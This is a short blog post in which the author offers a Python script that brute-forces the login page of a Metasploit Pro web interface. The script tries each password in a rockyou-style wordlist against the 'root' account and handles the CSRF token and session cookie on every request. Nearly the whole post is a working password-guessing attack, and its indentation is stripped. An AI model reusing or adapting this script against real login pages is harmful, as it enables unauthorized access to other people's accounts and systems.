Old Python Script to Brute-Force Metasploit Pro Web Interface

I wrote this python script to brute force a login to Metasploit Pro.  I doubt that it works for the current release because I believe they added a login threshold of 10 failed logins and it locks the account.

#!/usr/bin/python


import httplib


fpasswords = open('modRockyou.txt')
for password in fpasswords:
f = open('getResponse.txt','w')


conn = httplib.HTTPSConnection("127.0.0.1:3790")
conn.request("GET", "/login")
#conn.request("POST", "/user_sessions", postParam)
r1 = conn.getresponse()
f.write(r1.read())
f.close()


f = open('getResponse.txt')
for line in f:
if "authenticity_token" in line:
auth_token = line[193:237] # Pulls the authenticity token out of the GET request
#print "----"
#print line[193:237]
#print auth_token
#print " "
f.close()


header = r1.getheaders()
#print header


header2 = dict(r1.getheaders())
if header2.has_key('set-cookie'):
#print header2['set-cookie']
#print " "
ui_session_raw = header2['set-cookie']
ui_session =  ui_session_raw[0:234]


# Now that I have the authenticity_token from the GET response and the ui_session cookie I can send the post back into the server


#postParam = "utf8=%E2%9C%93&authenticity_token=hydDI8OCWE533edVJma3%2BJgVJUKOaqB1GNEL7XN9rq8%3D&user_session%5Busername%5D=root&user_session%5Bpassword%5D=mypassword&commit=Sign+in"

postParam = "utf8=%E2%9C%93&authenticity_token=" + auth_token + "&user_session%5Busername%5D=root&user_session%5Bpassword%5D=" + password.rstrip() + "&commit=Sign+in"


#_ui_session=BAh7CEkiD3Nlc3Npb25faWQGOgZFRkkiJThjZGZjMmMzNzRiMWUwOTQ2MjI3MmRjYzQyMWYwMWRjBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMVVVT2NJalRNZVlIS2tTQzhEc1R5U1kySHZUVHd1WWdOUVRaWlpnWmw3VW89BjsARkkiCmZsYXNoBjsARm86JUFjdGlvbkRpc3BhdGNoOjpGbGFzaDo6Rmxhc2hIYXNoCToKQHVzZWRvOghTZXQGOgpAaGFzaHsGOgplcnJvclQ6DEBjbG9zZWRGOg1AZmxhc2hlc3sGOwpJIiJJbnZhbGlkIHVzZXJuYW1lIG9yIHBhc3N3b3JkLgY7AEY6CUBub3cw--7ae6ffe189f3e025db7546e5e17552acc1e80201


headers = {"Cookie" : ui_session}


#print postParam
#print ' '
#print headers
#print ' '


conn.request("POST", "/user_sessions", postParam, headers)
r2 = conn.getresponse()
header3 = r2.getheaders()
#print header3
#print ' '
print password
#print ' '
header4 = dict(r2.getheaders())


user_cred_raw = header4['set-cookie']
if "user_credentials" in user_cred_raw:
info = "Login was successful with password " + password
print info
exit(0)


conn.close()


conn.close()
fpasswords.close()

Comments

Popular posts from this blog

Netflix Streaming Blocked by Sophos UTM

BSides 2016 Hackers Challenge

Python - Vega Conflict Script to Maximize Fleet Sizes based on Fleet Mass

VBA - Script to Download a file from a URL

IoT Malware Analysis - CnC Server - Part 3